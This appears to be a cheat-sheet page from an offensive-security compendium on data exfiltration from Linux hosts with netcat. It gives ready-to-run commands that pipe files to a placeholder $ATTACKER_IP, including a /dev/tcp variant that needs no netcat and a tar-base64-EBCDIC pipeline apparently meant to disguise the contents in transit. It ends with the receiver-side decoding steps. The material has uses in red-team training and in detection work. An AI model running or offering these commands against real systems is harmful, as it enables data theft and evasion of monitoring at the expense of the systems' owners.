killchain-compendium/exfiltration/linux/nc.md

Netcat

Receiver

• RX

nc -lp 8080 > out.txt

Transceiver

• TX

nc $ATTACKER_IP 8080 < in.txt

• TX without nc

cat <file> > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT

• Have to be end manually after a while

Compress and Encode

• Compress and encode the transmitted data

tar cfz - <directory> | base64 | dd conv=ebcdic > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT

• On receiver's side, after out.data has been received

dd conv=ascii if=out.data | base64 -d > out.tar
tar xvf out.tar